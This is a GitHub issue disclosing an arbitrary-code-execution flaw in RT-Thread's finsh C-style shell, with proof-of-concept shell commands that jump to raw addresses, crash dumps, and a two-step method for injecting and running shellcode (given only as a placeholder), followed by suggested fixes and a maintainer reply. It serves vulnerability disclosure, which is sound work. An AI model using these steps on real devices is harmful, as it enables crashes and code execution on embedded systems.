RT-Thread/rt-thread #4960: [Security Vulnerability] C-Style shell (finsh) leads to arbitrary code execution

kings-way, 2021-08-20:
* **[ Description ]**
The C-Style shell (finsh) of RT-Thread accepts C-expression like syntax from command line, in the form like ```hello()```.  Finsh will parse user's input as function calls in C, running lexical analysis and syntax analysis against it.  
However, for non-exist function names (symbols), if the symbol can be parsed as an integer, it will be taken as an address of a function. Apart from that,  recursive function calls would also cause some unexpected behavior in some situation

* **[ Expoit Case ]**
    * 1 ) Direct address jumping (function calling)
        ```
       finsh >0x8004acd()                   # jump to the address to function hello()
       Hello RT-Thread!
               0, 0x00000000
    
       finsh >0x04()                        # jump to 0x04, lead to crash
       psr: 0x40000000
       ...... (some more regs) ......
        lr: 0x080085ef
        pc: 0x00000004
       hard fault on thread: tshell
       
       thread pri  status      sp     stack size max used left tick  error
       ------ ---  ------- ---------- ----------  ------  ---------- ---
       tshell  20  ready   0x000000cc 0x00001000    13%   0x00000005 000
       tidle   31  ready   0x0000005c 0x00000100    51%   0x0000000e 000
       timer    4  suspend 0x00000080 0x00000200    25%   0x00000009 000
       main    10  suspend 0x000000b4 0x00000800    14%   0x0000000b 000
       usage fault:
       SCB_CFSR_UFSR:0x02 INVSTATE 
        ```

    * 2 )  Recursive function calls ```FUN1(FUN2())``` , or functions that return a function ```FUN()()```
        ```
        finsh >hello(0x04())            # jump to 0x04, lead to crash
        psr: 0x40000000
        ...... (some more regs) ......
        lr: 0x080085ef
        pc: 0x00000004
       hard fault on thread: tshell
       
       thread pri  status      sp     stack size max used left tick  error
       ------ ---  ------- ---------- ----------  ------  ---------- ---
       tshell  20  ready   0x000000cc 0x00001000    21%   0x00000008 000
       tidle   31  ready   0x0000005c 0x00000100    51%   0x00000012 000
       timer    4  suspend 0x00000080 0x00000200    25%   0x00000009 000
       main    10  suspend 0x000000b4 0x00000800    14%   0x0000000b 000
       usage fault:
       SCB_CFSR_UFSR:0x02 INVSTATE 
        ```   
    * 3 ) Arbitrary code execution
        First, crash the device with this command, in order to know where the shellcode will be placed (as in the pc register).
        ```
        finsh >hello("some shellcode"(), hello()) 
        ```
       Then, reset the device and exploit it with the shellcode and it's address (take 0x2000139c as an example)
        ```
        finsh >hello("some shellcode",  0x2000139c())
        ```

* **[ How to Fix ]**
    * Prohibit arbitrary address jumping when finsh symbols not found.
    * Prohibit recursive functions or multiple functions by default. (add some finsh configuration for users to re-enable it)

mysterywolf, 2021-08-20:
Hi, in the future version we will remove c-style mode from Finsh. I suggest you to use MSH mode like Unix command.

kings-way, 2021-08-21:
well noted

closed 2021-08-21 by mysterywolf